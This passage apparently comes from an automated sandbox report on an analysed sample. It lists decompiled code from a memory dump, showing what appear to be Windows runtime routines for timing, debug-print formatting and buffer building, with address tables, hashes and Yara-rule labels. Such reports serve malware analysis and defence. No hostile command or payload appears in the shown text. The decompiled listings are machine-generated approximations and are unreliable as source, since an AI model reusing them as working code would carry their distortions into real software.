                                                                                    0x00a353ab
                                                                                    0x00a353ae
                                                                                    0x00a353ae
                                                                                    0x00a353b5
                                                                                    0x00a353bf
                                                                                    0x00a353bf
                                                                                    0x00a35375
                                                                                    0x00a35396
                                                                                    0x00a353a0
                                                                                    0x00a353a0
                                                                                    0x00000000
                                                                                    0x00a35396
                                                                                    0x00a35377
                                                                                    0x00a35379
                                                                                    0x00a3537f
                                                                                    0x00a3538c
                                                                                    0x00a35390
                                                                                    0x00000000
                                                                                    0x00a35390
                                                                                    0x00a351ee
                                                                                    0x00a351f1
                                                                                    0x00a35301
                                                                                    0x00a35310
                                                                                    0x00a35315
                                                                                    0x00a35318
                                                                                    0x00a3531b
                                                                                    0x00a35320
                                                                                    0x00a3532e
                                                                                    0x00a35331
                                                                                    0x00000000
                                                                                    0x00a35331
                                                                                    0x00a35328
                                                                                    0x00a35329
                                                                                    0x00000000
                                                                                    0x00a35329
                                                                                    0x00a351fa
                                                                                    0x00a35235
                                                                                    0x00a35236
                                                                                    0x00a35239
                                                                                    0x00a3523f
                                                                                    0x00a35240
                                                                                    0x00a35241
                                                                                    0x00a35242
                                                                                    0x00a35246
                                                                                    0x00a35247
                                                                                    0x00a3524e
                                                                                    0x00a35251
                                                                                    0x00a35267
                                                                                    0x00a35269
                                                                                    0x00a3526e
                                                                                    0x00a3527d
                                                                                    0x00a3527e
                                                                                    0x00a35281
                                                                                    0x00a35282
                                                                                    0x00a35287
                                                                                    0x00a35288
                                                                                    0x00a3528a
                                                                                    0x00a3528f
                                                                                    0x00a35294
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00a3529a
                                                                                    0x00a3529c
                                                                                    0x00a3529e
                                                                                    0x00a3529e
                                                                                    0x00a352a4
                                                                                    0x00a352b0
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00a352ba
                                                                                    0x00a352bc
                                                                                    0x00a352bc
                                                                                    0x00a352d4
                                                                                    0x00a352d9
                                                                                    0x00a352dc
                                                                                    0x00a352e1
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00a352e7
                                                                                    0x00a352f4
                                                                                    0x00000000
                                                                                    0x00a352f4
                                                                                    0x00a35270
                                                                                    0x00000000
                                                                                    0x00a35270
                                                                                    0x00a351fc
                                                                                    0x00a351fd
                                                                                    0x00a35202
                                                                                    0x00a35203
                                                                                    0x00a35205
                                                                                    0x00a3520a
                                                                                    0x00a3520f
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00a3521b
                                                                                    0x00a35226
                                                                                    0x00a3522b
                                                                                    0x00a3521d
                                                                                    0x00a3521d
                                                                                    0x00a35222
                                                                                    0x00a35222
                                                                                    0x00a3522d
                                                                                    0x00000000

                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.314955752.0000000000990000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID: Legacy$UEFI
                                                                                    • API String ID: 2994545307-634100481
                                                                                    • Opcode ID: 56f800f5a1f0fe4e0a07d3b1b5b9f1995c5c2ed89ec1ff7b7bd9a2a43027ccf9
                                                                                    • Instruction ID: 9e04cb947abaef22320e1f760b9052803385e41ff7f808dd6f5cc4406e598099
                                                                                    • Opcode Fuzzy Hash: 56f800f5a1f0fe4e0a07d3b1b5b9f1995c5c2ed89ec1ff7b7bd9a2a43027ccf9
                                                                                    • Instruction Fuzzy Hash: DE5149B1E00A199FDB24DFA9C991BAEBBF8BF48740F24402DF549EB291D671D940CB50
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 009DB944, Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 76%
                                                                                    			E009DB944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0xaad360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E009D7D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E00A88CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E009F9E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E009FB640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E009FCE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E009D7D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							L00A88F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = L009FAF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0xaa8628; // 0x0
								_v68 = _t77;
								_t78 =  *0xaa862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0xaa8628; // 0x0
							_t116 =  *0xaa862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}
















































                                                                                    0x009db94c
                                                                                    0x009db956
                                                                                    0x009db95c
                                                                                    0x009db95e
                                                                                    0x009db964
                                                                                    0x009db969
                                                                                    0x009db96d
                                                                                    0x009db96d
                                                                                    0x009db970
                                                                                    0x009db974
                                                                                    0x009db97a
                                                                                    0x009dbadf
                                                                                    0x009dbadf
                                                                                    0x009dbae2
                                                                                    0x009dbae4
                                                                                    0x009dbae6
                                                                                    0x009dbaf0
                                                                                    0x00a22cb8
                                                                                    0x009dbaf6
                                                                                    0x009dbaf6
                                                                                    0x009dbaf6
                                                                                    0x009dbafd
                                                                                    0x009dbb1f
                                                                                    0x009dbb1f
                                                                                    0x009dbaff
                                                                                    0x009dbb00
                                                                                    0x009dbb00
                                                                                    0x009dbb03
                                                                                    0x009dbb03
                                                                                    0x009dbacb
                                                                                    0x009dbacf
                                                                                    0x009dbad0
                                                                                    0x009dbad1
                                                                                    0x009dbadc
                                                                                    0x009dbadc
                                                                                    0x009db980
                                                                                    0x009db980
                                                                                    0x009db988
                                                                                    0x009db98b
                                                                                    0x009db98d
                                                                                    0x009db990
                                                                                    0x009db993
                                                                                    0x009db999
                                                                                    0x009db99b
                                                                                    0x009db9a1
                                                                                    0x009db9a5
                                                                                    0x009db9aa
                                                                                    0x009db9b0
                                                                                    0x009db9bb
                                                                                    0x009db9c0
                                                                                    0x009db9c3
                                                                                    0x009db9ca
                                                                                    0x009db9cc
                                                                                    0x009db9cf
                                                                                    0x009db9d3
                                                                                    0x009db9d7
                                                                                    0x009dba94
                                                                                    0x009dba94
                                                                                    0x009dba98
                                                                                    0x009dbaa3
                                                                                    0x00a22ccb
                                                                                    0x009dbaa9
                                                                                    0x009dbaa9
                                                                                    0x009dbaa9
                                                                                    0x009dbab1
                                                                                    0x00a22cd5
                                                                                    0x00a22cdd
                                                                                    0x00a22cdd
                                                                                    0x009dbabb
                                                                                    0x009dbabc
                                                                                    0x009dbac2
                                                                                    0x009dbac3
                                                                                    0x009dbac3
                                                                                    0x009dbac6
                                                                                    0x00000000
                                                                                    0x009db9dd
                                                                                    0x009db9dd
                                                                                    0x009db9e7
                                                                                    0x009db9e7
                                                                                    0x009db9ec
                                                                                    0x009db9ec
                                                                                    0x009db9f1
                                                                                    0x009db9f5
                                                                                    0x009db9fa
                                                                                    0x009dba00
                                                                                    0x009dba0c
                                                                                    0x009dba10
                                                                                    0x009dba10
                                                                                    0x009dba12
                                                                                    0x009dba18
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x009dbb26
                                                                                    0x009dbb26
                                                                                    0x009dba1e
                                                                                    0x009dba1e
                                                                                    0x009dba23
                                                                                    0x009dba25
                                                                                    0x009dba2c
                                                                                    0x009dba30
                                                                                    0x009dba35
                                                                                    0x009dba35
                                                                                    0x009dba41
                                                                                    0x009dba46
                                                                                    0x009dba4c
                                                                                    0x009dba50
                                                                                    0x009dba54
                                                                                    0x009dba6a
                                                                                    0x009dba6e
                                                                                    0x009dba70
                                                                                    0x009dba74
                                                                                    0x009dba78
                                                                                    0x009dba7a
                                                                                    0x009dba7c
                                                                                    0x009dba8e
                                                                                    0x009dba90
                                                                                    0x009dba92
                                                                                    0x009dbb14
                                                                                    0x009dbb14
                                                                                    0x009dbb16
                                                                                    0x009dbb16
                                                                                    0x00000000
                                                                                    0x009dba7c
                                                                                    0x009dbb0a
                                                                                    0x009dbb0d
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x009dbb0f

                                                                                    APIs
                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009DB9A5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.314955752.0000000000990000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                    • String ID:
                                                                                    • API String ID: 885266447-0
                                                                                    • Opcode ID: 12463c504d75e6ab43611b83f5c0e565512e72fa99dff0ec9fa2e2af162fa234
                                                                                    • Instruction ID: bae64d121b4ae5de17784f69c3e72c9054d5f0f2f0c0358257379156960bfeba
                                                                                    • Opcode Fuzzy Hash: 12463c504d75e6ab43611b83f5c0e565512e72fa99dff0ec9fa2e2af162fa234
                                                                                    • Instruction Fuzzy Hash: 64515771A08341CFC720CF29C490A2ABBE9BB88704F65896FF68587355DB34EC40CB92
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 009BB171, Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 78%
                                                                                    			E009BB171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0xa8f7a8);
				E00A0D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E00A0D130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E009FD000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E009FF3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											L00A0DEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E009FB280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												L009FB7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E009FE2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E009FA890() != 0) {
					goto L6;
				}
				goto L3;
			}






















                                                                                    0x009bb171
                                                                                    0x009bb171
                                                                                    0x009bb171
                                                                                    0x009bb171
                                                                                    0x009bb171
                                                                                    0x009bb176
                                                                                    0x009bb17b
                                                                                    0x009bb180
                                                                                    0x009bb186
                                                                                    0x009bb18f
                                                                                    0x009bb198
                                                                                    0x009bb1a4
                                                                                    0x009bb1aa
                                                                                    0x00a14802
                                                                                    0x00a14802
                                                                                    0x00a14805
                                                                                    0x00a1480c
                                                                                    0x00a1480e
                                                                                    0x009bb1d1
                                                                                    0x009bb1d3
                                                                                    0x009bb1de
                                                                                    0x009bb1de
                                                                                    0x00a14817
                                                                                    0x00a1481e
                                                                                    0x00a14820
                                                                                    0x00a14822
                                                                                    0x00a14822
                                                                                    0x00a14824
                                                                                    0x00a14824
                                                                                    0x00a1482a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00a14835
                                                                                    0x00a1483a
                                                                                    0x00a1483d
                                                                                    0x00a1483f
                                                                                    0x00a14842
                                                                                    0x00a14842
                                                                                    0x00a14842
                                                                                    0x00a14846
                                                                                    0x00a1484c
                                                                                    0x00a1484e
                                                                                    0x00a14851
                                                                                    0x00a14851
                                                                                    0x00a14853
                                                                                    0x00a14854
                                                                                    0x00a14854
                                                                                    0x00a14858
                                                                                    0x00a1485a
                                                                                    0x00a1485a
                                                                                    0x00a1485d
                                                                                    0x00a1485f
                                                                                    0x00a14861
                                                                                    0x00a14861
                                                                                    0x00a14866
                                                                                    0x00a1486b
                                                                                    0x00a1486e
                                                                                    0x00a14871
                                                                                    0x00a14876
                                                                                    0x00a14876
                                                                                    0x00a14878
                                                                                    0x00a1487b
                                                                                    0x00a14884
                                                                                    0x00a14884
                                                                                    0x00000000
                                                                                    0x00a1487d
                                                                                    0x00a1487d
                                                                                    0x00a14882
                                                                                    0x00a14889
                                                                                    0x00a14889
                                                                                    0x00a1488f
                                                                                    0x00a14891
                                                                                    0x00a148e0
                                                                                    0x00a148e2
                                                                                    0x00a148e4
                                                                                    0x00a148e4
                                                                                    0x00a148e7
                                                                                    0x00a148e7
                                                                                    0x00a148ed
                                                                                    0x00a148f4
                                                                                    0x00a148f6
                                                                                    0x00a14951
                                                                                    0x00a14951
                                                                                    0x00a14953
                                                                                    0x00a14953
                                                                                    0x00a14956
                                                                                    0x00a14956
                                                                                    0x00a14958
                                                                                    0x00a14959
                                                                                    0x00a14959
                                                                                    0x00a1495d
                                                                                    0x00a1495d
                                                                                    0x00a1495f
                                                                                    0x00a1495f
                                                                                    0x00a14965
                                                                                    0x00a14969
                                                                                    0x00a149ba
                                                                                    0x00a149ba
                                                                                    0x00a149c1
                                                                                    0x00a149c5
                                                                                    0x00a149cc
                                                                                    0x00a149d4
                                                                                    0x00a149d7
                                                                                    0x00a149da
                                                                                    0x00a149e4
                                                                                    0x00a149e5
                                                                                    0x00a149f3
                                                                                    0x00a14a02
                                                                                    0x00000000
                                                                                    0x00a14a02
                                                                                    0x00a14972
                                                                                    0x00a14974
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00a14976
                                                                                    0x00a14979
                                                                                    0x00a14982
                                                                                    0x00a14983
                                                                                    0x00a14984
                                                                                    0x00a1498b
                                                                                    0x00a1498d
                                                                                    0x00a14991
                                                                                    0x00a14993
                                                                                    0x00a14999
                                                                                    0x00a1499d
                                                                                    0x00a149a2
                                                                                    0x00a149a2
                                                                                    0x00a149a2
                                                                                    0x00a14999
                                                                                    0x00a149ac
                                                                                    0x00000000
                                                                                    0x00a149b3
                                                                                    0x00a148f8
                                                                                    0x00a148fe
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00a148fe
                                                                                    0x00a14895
                                                                                    0x00a1489c
                                                                                    0x00a148ad
                                                                                    0x00a148b2
                                                                                    0x00a148b5
                                                                                    0x00a148b7
                                                                                    0x00a148ba
                                                                                    0x00a148bc
                                                                                    0x00a148c6
                                                                                    0x00a148c6
                                                                                    0x00a148cb
                                                                                    0x00a148d1
                                                                                    0x00a148d4
                                                                                    0x00a148d8
                                                                                    0x00a148d8
                                                                                    0x00000000
                                                                                    0x00a148d8
                                                                                    0x00a148be
                                                                                    0x00a148c0
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00a148c2
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00a148c4
                                                                                    0x00000000
                                                                                    0x00a14882
                                                                                    0x00a1487b
                                                                                    0x00a14904
                                                                                    0x00a14906
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00a14908
                                                                                    0x00a1490e
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00a14910
                                                                                    0x00a14917
                                                                                    0x00a14917
                                                                                    0x00000000
                                                                                    0x00a14917
                                                                                    0x009bb1ba
                                                                                    0x00a147f9
                                                                                    0x00a147fc
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00a147fc
                                                                                    0x009bb1c0
                                                                                    0x009bb1c0
                                                                                    0x009bb1c3
                                                                                    0x009bb1cb
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.314955752.0000000000990000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: _vswprintf_s
                                                                                    • String ID:
                                                                                    • API String ID: 677850445-0
                                                                                    • Opcode ID: 9ed48007bee7c7d62d3797cf67240b276970d72a16314072bb39e1299a67f682
                                                                                    • Instruction ID: 912c82f03ff54c186773d8bf4a0b5a71c56bec40a76a6e34b4dedcc70c67a93b
                                                                                    • Opcode Fuzzy Hash: 9ed48007bee7c7d62d3797cf67240b276970d72a16314072bb39e1299a67f682
                                                                                    • Instruction Fuzzy Hash: F951D071D002698EDB30DF6CC945BFEBBB1BF48710F2041ADE859AB282D7744D819B90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 009E2581, Relevance: 1.6, Strings: 1, Instructions: 329COMMONCrypto
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 83%
                                                                                    			E009E2581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, intOrPtr _a35) {
				signed int _v8;
				signed int _v16;
				unsigned int _v24;
				void* _v28;
				signed int _v32;
				unsigned int _v36;
				signed int _v37;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _t239;
				signed int _t243;
				char _t244;
				char _t245;
				signed int _t248;
				signed int _t250;
				intOrPtr _t252;
				signed int _t255;
				signed int _t262;
				signed int _t265;
				signed int _t273;
				intOrPtr _t279;
				signed int _t281;
				signed int _t283;
				void* _t284;
				signed int _t285;
				signed int _t286;
				unsigned int _t289;
				signed int _t293;
				void* _t294;
				signed int _t295;
				signed int _t299;
				intOrPtr _t312;
				signed int _t321;
				signed int _t323;
				signed int _t324;
				signed int _t328;
				signed int _t329;
				signed int _t331;
				signed int _t333;
				signed int _t335;
				void* _t336;

				_t333 = _t335;
				_t336 = _t335 - 0x4c;
				_v8 =  *0xaad360 ^ _t333;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t328 = 0xaab2e8;
				_v56 = _a4;
				_v48 = __edx;
				_v60 = __ecx;
				_t289 = 0;
				_v80 = 0;
				asm("movsd");
				_v64 = 0;
				_v76 = 0;
				_v72 = 0;
				asm("movsd");
				_v44 = 0;
				_v52 = 0;
				_v68 = 0;
				asm("movsd");
				_v32 = 0;
				_v36 = 0;
				asm("movsd");
				_v16 = 0;
				_t279 = 0x48;
				_t309 = 0 | (_v24 >> 0x0000001c & 0x00000003) == 0x00000001;
				_t321 = 0;
				_v37 = _t309;
				if(_v48 <= 0) {
					L16:
					_t45 = _t279 - 0x48; // 0x0
					__eflags = _t45 - 0xfffe;
					if(_t45 > 0xfffe) {
						_t329 = 0xc0000106;
						goto L32;
					} else {
						_t328 = L009D4620(_t289,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t279);
						_v52 = _t328;
						__eflags = _t328;
						if(_t328 == 0) {
							_t329 = 0xc0000017;
							goto L32;
						} else {
							 *(_t328 + 0x44) =  *(_t328 + 0x44) & 0x00000000;
							_t50 = _t328 + 0x48; // 0x48
							_t323 = _t50;
							_t309 = _v32;
							 *((intOrPtr*)(_t328 + 0x3c)) = _t279;
							_t281 = 0;
							 *((short*)(_t328 + 0x30)) = _v48;
							__eflags = _t309;
							if(_t309 != 0) {
								 *(_t328 + 0x18) = _t323;
								__eflags = _t309 - 0xaa8478;
								 *_t328 = ((0 | _t309 == 0x00aa8478) - 0x00000001 & 0xfffffffb) + 7;
								E009FF3E0(_t323,  *((intOrPtr*)(_t309 + 4)),  *_t309 & 0x0000ffff);
								_t309 = _v32;
								_t336 = _t336 + 0xc;
								_t281 = 1;
								__eflags = _a8;
								_t323 = _t323 + (( *_t309 & 0x0000ffff) >> 1) * 2;
								if(_a8 != 0) {
									_t273 = E00A439F2(_t323);
									_t309 = _v32;
									_t323 = _t273;
								}
							}
							_t293 = 0;
							_v16 = 0;
							__eflags = _v48;
							if(_v48 <= 0) {
								L31:
								_t329 = _v68;
								__eflags = 0;
								 *((short*)(_t323 - 2)) = 0;
								goto L32;
							} else {
								_t283 = _t328 + _t281 * 4;
								_v56 = _t283;
								do {
									__eflags = _t309;
									if(_t309 != 0) {
										_t239 =  *(_v60 + _t293 * 4);
										__eflags = _t239;
										if(_t239 == 0) {
											goto L30;
										} else {
											__eflags = _t239 == 5;
											if(_t239 == 5) {
												goto L30;
											} else {
												goto L22;
											}
										}
									} else {
										L22:
										 *_t283 =  *(_v60 + _t293 * 4);
										 *(_t283 + 0x18) = _t323;
										_t243 =  *(_v60 + _t293 * 4);
										__eflags = _t243 - 8;
										if(_t243 > 8) {
											goto L56;
										} else {
